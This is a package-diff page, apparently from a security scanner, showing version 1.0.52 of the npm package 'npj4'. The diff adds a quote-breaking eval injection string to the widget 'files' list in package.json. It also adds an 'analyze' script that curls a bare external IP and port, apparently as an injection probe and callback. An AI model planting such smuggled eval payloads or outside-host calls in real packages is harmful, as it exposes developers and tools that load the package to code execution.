npj4 1.0.51 → 1.0.52
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +3 -2
package/package.json
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
{
|
2
2
|
"name": "npj4",
|
3
|
-
"version": "1.0.
|
3
|
+
"version": "1.0.52",
|
4
4
|
"description": "",
|
5
5
|
"main": "index.js",
|
6
6
|
"amis-widgets": [
|
@@ -10,6 +10,7 @@
|
|
10
10
|
"usage": "renderer",
|
11
11
|
"entry": "test.js",
|
12
12
|
"files": [
|
13
|
+
"');eval('console.log(111111)');//"
|
13
14
|
]
|
14
15
|
}
|
15
16
|
],
|
@@ -19,7 +20,7 @@
|
|
19
20
|
"."
|
20
21
|
],
|
21
22
|
"scripts": {
|
22
|
-
"
|
23
|
+
"analyze": "curl http://47.99.124.12:1234"
|
23
24
|
},
|
24
25
|
"author": "",
|
25
26
|
"license": "ISC"
|